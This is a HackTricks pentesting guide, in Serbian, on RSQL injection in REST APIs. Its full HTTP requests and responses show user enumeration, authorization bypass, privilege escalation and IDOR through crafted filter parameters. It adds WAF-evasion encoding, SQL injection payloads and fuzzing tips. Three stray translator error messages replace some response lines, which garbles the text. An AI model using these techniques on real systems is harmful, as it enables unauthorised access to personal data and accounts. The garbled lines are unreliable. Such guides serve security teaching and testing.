HackTricks
RSQL Injection
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Šta je RSQL?
RSQL je query language dizajniran za parameterizovano filtriranje inputa u RESTful APIs. Baziran na FIQL (Feed Item Query Language), koji je originalno specificirao Mark Nottingham za query-ovanje Atom feedova, RSQL se izdvaja svojom jednostavnošću i mogućnošću da izrazi kompleksne upite na kompaktan i URI-kompatibilan način preko HTTP-a. Ovo ga čini odličnim izborom kao generalni query language za pretragu REST endpoint-a.
Pregled
RSQL Injection je ranjivost u web aplikacijama koje koriste RSQL kao query language u RESTful APIs. Slično SQL Injection i LDAP Injection, ova ranjivost se javlja kada RSQL filteri nisu pravilno sanitizovani, omogućavajući napadaču da injektuje maliciozne upite kako bi pristupio, izmenio ili obrisao podatke bez autorizacije.
Kako to funkcioniše?
RSQL vam omogućava da sastavite napredne upite u RESTful APIs, na primer:
/products?filter=price>100;category==electronics
Ovo se prevodi u strukturisani upit koji filtrira proizvode sa cenom većom od 100 i kategorijom „elektronika“.
Ako aplikacija nevalidira ispravno korisnički unos, napadač može da manipuliše filterom i izvrši neočekivane upite, kao što su:
/products?filter=id=in=(1,2,3);delete_all==true
Ili čak iskoristiti za izdvajanje osetljivih informacija pomoću Boolean upita ili ugnježdenih subqueries.
Rizici
- Otkrivanje osetljivih podataka: Napadač može pribaviti informacije koje ne bi trebalo da budu dostupne.
- Izmena ili brisanje podataka: Injekcija filtera koja menja zapise u bazi podataka.
- Povećanje privilegija: Manipulacija identifikatorima koji dodeljuju role kroz filtre kako bi se prevarila aplikacija i pristupilo sa privilegijama drugih korisnika.
- Zaobilaženje kontrole pristupa: Manipulacija filterima da bi se pristupilo ograničenim podacima.
- Impersonacija ili IDOR: Izmena identifikatora između korisnika kroz filtre koja omogućava pristup informacijama i resursima drugih korisnika bez pravilne autentifikacije.
Podržani RSQL operatori
| Operator | Opis | Primer |
|---|---|---|
; / and | Logički AND operator. Filtrira redove gde su obe uslova tačna | /api/v2/myTable?q=columnA==valueA;columnB==valueB |
, / or | Logički OR operator. Filtrira redove gde je bar jedan od uslova tačan | /api/v2/myTable?q=columnA==valueA,columnB==valueB |
== | Izvršava jednak upit. Vraća sve redove iz myTable gde vrednosti u columnA tačno odgovaraju queryValue | /api/v2/myTable?q=columnA==queryValue |
=q= | Izvršava search upit. Vraća sve redove iz myTable gde vrednosti u columnA sadrže queryValue | /api/v2/myTable?q=columnA=q=queryValue |
=like= | Izvršava like upit. Vraća sve redove iz myTable gde vrednosti u columnA liče na queryValue | /api/v2/myTable?q=columnA=like=queryValue |
=in= | Izvršava in upit. Vraća sve redove iz myTable gde columnA sadrži valueA ILI valueB | /api/v2/myTable?q=columnA=in=(valueA, valueB) |
=out= | Izvršava exclude upit. Vraća sve redove iz myTable gde vrednosti u columnA nisu ni valueA ni valueB | /api/v2/myTable?q=columnA=out=(valueA,valueB) |
!= | Izvršava upit not equals. Vraća sve redove iz myTable gde vrednosti u columnA nisu jednake queryValue | /api/v2/myTable?q=columnA!=queryValue |
=notlike= | Izvršava not like upit. Vraća sve redove iz myTable gde vrednosti u columnA nisu kao queryValue | /api/v2/myTable?q=columnA=notlike=queryValue |
< & =lt= | Izvršava upit manje od. Vraća sve redove iz myTable gde su vrednosti u columnA manje od queryValue | /api/v2/myTable?q=columnA<queryValue /api/v2/myTable?q=columnA=lt=queryValue |
=le= & <= | Izvršava upit manje ili jednako. Vraća sve redove iz myTable gde su vrednosti u columnA manje ili jednake queryValue | /api/v2/myTable?q=columnA<=queryValue /api/v2/myTable?q=columnA=le=queryValue |
> & =gt= | Izvršava upit veće od. Vraća sve redove iz myTable gde su vrednosti u columnA veće od queryValue | /api/v2/myTable?q=columnA>queryValue /api/v2/myTable?q=columnA=gt=queryValue |
>= & =ge= | Izvršava upit jednako ili veće od. Vraća sve redove iz myTable gde su vrednosti u columnA jednake ili veće od queryValue | /api/v2/myTable?q=columnA>=queryValue /api/v2/myTable?q=columnA=ge=queryValue |
=rng= | Izvršava upit od–do. Vraća sve redove iz myTable gde su vrednosti u columnA jednake ili veće od fromValue, i manje ili jednake toValue | /api/v2/myTable?q=columnA=rng=(fromValue,toValue) |
Napomena: Tabela zasnovana na informacijama iz MOLGENIS i rsql-parser aplikacija.
Primeri
- name==“Kill Bill”;year=gt=2003
- name==“Kill Bill” and year>2003
- genres=in=(sci-fi,action);(director==‘Christopher Nolan’,actor==*Bale);year=ge=2000
- genres=in=(sci-fi,action) and (director==‘Christopher Nolan’ or actor==*Bale) and year>=2000
- director.lastName==Nolan;year=ge=2000;year=lt=2010
- director.lastName==Nolan and year>=2000 and year<2010
- genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino
- genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino
Napomena: Tabela zasnovana na informacijama iz rsql-parser aplikacije.
Uobičajeni filteri
Ovi filteri pomažu da se preciziraju upiti u API-jima:
| Filter | Opis | Primer |
|---|---|---|
filter[users] | Filtrira rezultate po određenim korisnicima | /api/v2/myTable?filter[users]=123 |
filter[status] | Filtrira po statusu (active/inactive, completed, itd.) | /api/v2/orders?filter[status]=active |
filter[date] | Filtrira rezultate unutar vremenskog opsega | /api/v2/logs?filter[date]=gte:2024-01-01 |
filter[category] | Filtrira po kategoriji ili tipu resursa | /api/v2/products?filter[category]=electronics |
filter[id] | Filtrira po jedinstvenom identifikatoru | /api/v2/posts?filter[id]=42 |
Uobičajeni parametri
Ovi parametri pomažu u optimizaciji odgovora API-ja:
| Parameter | Opis | Primer |
|---|---|---|
include | Uključuje povezane resurse u odgovor | /api/v2/orders?include=customer,items |
sort | Sortira rezultate rastuće ili opadajuće | /api/v2/users?sort=-created_at |
page[size] | Kontroliše broj rezultata po stranici | /api/v2/products?page[size]=10 |
page[number] | Navodi broj stranice | /api/v2/products?page[number]=2 |
fields[resource] | Definiše koja polja da se vrate u odgovoru | /api/v2/users?fields[users]=id,name,email |
search | Izvodi fleksibilniju pretragu | /api/v2/posts?search=technology |
Informacioni leak i enumeracija korisnika
Sledeći zahtev prikazuje registration endpoint koji zahteva parametar email da bi proverio da li postoji korisnik registrovan sa tim email-om i vraća true ili false u zavisnosti od toga da li postoji u bazi podataka:
Zahtev
GET /api/registrations HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Odgovor
HTTP/1.1 400
Date: Sat, 22 Mar 2025 14:47:14 GMT
Content-Type: application/vnd.api+json
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 85
{
"errors": [{
"code": "BLANK",
"detail": "Missing required param: email",
"status": "400"
}]
}
Iako se očekuje /api/registrations?email=<emailAccount>, moguće je koristiti RSQL filtere da bi se pokušalo enumerisati i/ili izdvojiti informacije o korisniku kroz upotrebu posebnih operatora:
Zahtev
GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://locahost:3000
Connection: keep-alive
Referer: https://locahost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Nedostaje sadržaj za prevod. Pošaljite sadržaj datoteke src/pentesting-web/rsql-injection.md koji treba da prevedem.
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:09:38 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 38
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"attributes": {
"tenants": []
}
}
}
U slučaju podudaranja sa važećim email nalogom, aplikacija bi vratila informacije o korisniku umesto klasičnog “true”, “1” ili nečeg sličnog u odgovoru serveru:
Request
GET /api/registrations?filter[userAccounts]=email=='manuel**********@domain.local' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Odgovor
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:19:46 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 293
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"id": "********************",
"type": "UserAccountDTO",
"attributes": {
"id": "********************",
"type": "UserAccountDTO",
"email": "manuel**********@domain.local",
"sub": "*********************",
"status": "ACTIVE",
"tenants": [{
"id": "1"
}]
}
}
}
Zaobilaženje autorizacije
U ovom scenariju, polazimo od korisnika sa osnovnom ulogom i kod kojeg nemamo privilegovana ovlašćenja (npr. administrator) za pristup listi svih korisnika registrovanih u bazi podataka:
Zahtev
GET /api/users HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
Content-Length: 0
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Opet koristimo filtere i specijalne operatore koji će nam omogućiti alternativan način da dobijemo informacije o users i da zaobiđemo kontrolu pristupa. Na primer, filtriraj one users koji sadrže slovo “a” u svom user ID:
Request
GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Odgovor
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:43:28 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 1434192
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "********A***********",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "**********@domain.local",
"firstName": "rafael",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "*********",
"taxIdentifier": "********",
"languageId": 1,
"createdAt": "2024-08-09T10:57:41.237Z",
"termsOfUseAccepted": true,
"id": "******************",
"type": "UserGetResponseCustomDTO"
}
}, {
"id": "*A*******A*****A*******A******",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": ""************",
"email": "juan*******@domain.local",
"firstName": "juan",
"surname": ""************",",
"telephoneCountryCode": "**",
"mobilePhone": "************",
"taxIdentifier": "************",
"languageId": 1,
"createdAt": "2024-07-18T06:07:37.68Z",
"termsOfUseAccepted": true,
"id": "*******************",
"type": "UserGetResponseCustomDTO"
}
}, {
................
Privilege Escalation
Veoma je verovatno naići na određene endpoint-e koji proveravaju privilegije korisnika preko njihove role. Na primer, imamo korisnika koji nema privilegije:
Zahtev
GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb......
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 11
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": []
}
Korišćenjem određenih operatora mogli bismo enumerisati administratorske korisnike:
Zahtev
GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJh.....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Odgovor
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 361
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"type": "CompanyUserGetResponseDTO",
"attributes": {
"companyId": "FA**************",
"companyTaxIdentifier": "B999*******",
"bizName": "company sl",
"email": "jose*******@domain.local",
"userRole": {
"userRoleId": 1,
"userRoleKey": "general.roles.admin"
},
"companyCountryTranslationKey": "*******",
"type": "CompanyUserGetResponseDTO"
}
}]
}
Nakon što se zna identifikator administratorskog korisnika, moguće je iskoristiti eskalaciju privilegija zamenom ili dodavanjem odgovarajućeg filtera identifikatorom administratora i dobiti iste privilegije:
Zahtev
GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ.....
Origin: https:/localhost:3000
Connection: keep-alive
Referer: https:/localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Odgovor
HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 68833
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"meta": {
"Functionalities": [{
"functionalityId": 1,
"permissionId": 1,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.userProfile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 2,
"permissionId": 2,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.my_profile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 3,
"permissionId": 3,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "layout.change_user_data",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 4,
"permissionId": 4,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.configuration",
"type": "FunctionalityPermissionDTO"
}, {
....
}]
}
}
Impersonate or Insecure Direct Object References (IDOR)
Pored upotrebe parametra filter, moguće je koristiti i druge parametre, npr. include, koji omogućava da se u rezultat uključe određena polja (npr. jezik, država, lozinka…).
U sledećem primeru prikazane su informacije našeg korisničkog profila:
Zahtev
GET /api/users?include=language,country HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Ne vidim sadržaj fajla src/pentesting-web/rsql-injection.md. Molim pošaljite tekst koji treba da prevedem (zadržaću markdown/html sintaksu i neću prevoditi kod, tagove, linkove i putanje).
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:47:27 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 540
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "D5********************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "**********",
"email": "domingo....@domain.local",
"firstName": "Domingo",
"surname": "**********",
"telephoneCountryCode": "**",
"mobilePhone": "******",
"languageId": 1,
"createdAt": "2024-03-11T07:24:57.627Z",
"termsOfUseAccepted": true,
"howMeetUs": "**************",
"id": "D5********************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Kombinacija filtera može se koristiti za zaobilaženje kontrole autorizacije i dobijanje pristupa profilima drugih korisnika:
Zahtev
GET /api/users?include=language,country&filter[users]=id=='94***************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Molim vas pošaljite sadržaj fajla src/pentesting-web/rsql-injection.md koji želite da prevedem na srpski.
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:50:07 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 520
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "94******************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 2,
"translationKey": "**************",
"email": "jose******@domain.local",
"firstName": "jose",
"surname": "***************",
"telephoneCountryCode": "**",
"mobilePhone": "********",
"taxIdentifier": "*********",
"languageId": 1,
"createdAt": "2024-11-21T08:29:05.833Z",
"termsOfUseAccepted": true,
"id": "94******************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Otkrivanje i fuzzing — brze pobede
- Proverite podršku za RSQL slanjem bezopasnih sondi kao što su
?filter=id==test,?q==testili malformisanih operatora=foo=; verbose APIs često leak parser errors (“Unknown operator” / “Unknown property”). - Mnoge implementacije dvostruko parsiraju URL parametre; pokušajte duplo enkodiranje
(,),*,;(npr.%2528admin%2529) da biste zaobišli naivne blocklists i WAFs. - Boolean exfil with wildcards:
filter[users]=email==*%@example.com;status==ACTIVEi promenite logiku sa,(OR) da uporedite veličine odgovora. - Range/proximity leaks:
filter[users]=createdAt=rng=(2024-01-01,2025-01-01)brzo enumeriše po godinama bez poznavanja tačnih ID-jeva.
Zloupotrebe specifične za framework (Elide / JPA Specification / JSON:API)
- Elide i mnogi Spring Data REST projekti prevode RSQL direktno u JPA Criteria. Kada developeri dodaju custom operatore (npr.
=ilike=) i grade predicate pomoću konkatenacije stringova umesto prepared parameters, možete pivotirati na SQLi (klasični payload:name=ilike='%%' OR 1=1--'). - Elide analytic data store prihvata parameterized columns; kombinovanje user-controlled analytic params sa RSQL filterima bio je uzrok SQLi u CVE-2022-24827. Čak i ako patched verzije pravilno parameterizuju, sličan bespoke kod često ostaje — tražite
@JoinFilter/@ReadPermissionSpEL izraze koji sadrže${}i pokušajte injektovati';sleep(5);'ili logičke tautologije. - JSON:API backend-i često izlažu i
includeifilter. Filtriranje po povezanim resursimafilter[orders]=customer.email==*admin*može zaobići top-level ACLs zato što se relation-level filteri izvršavaju pre ownership provera.
Pomoćni alati za automatizaciju
- rsql-parser CLI (Java):
java -jar rsql-parser.jar "name=='*admin*';status==ACTIVE"validira payloads lokalno i prikazuje abstract syntax tree — korisno za kreiranje balansiranih zagrada i custom operatora. - Python quick builder:
from pyrsql import RSQL
payload = RSQL().and_("email==*admin*", "status==ACTIVE").or_("role=in=(owner,admin)")
print(str(payload))
- Povežite sa HTTP fuzzer (ffuf, turbo-intruder) iterirajući wildcard pozicije
*a*,*e*, itd., unutar=in=lista da brzo nabrojite ID-jeve i email adrese.
Izvori
Tip
Učite i vežbajte AWS Hacking:
Učite i vežbajte GCP Hacking:Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.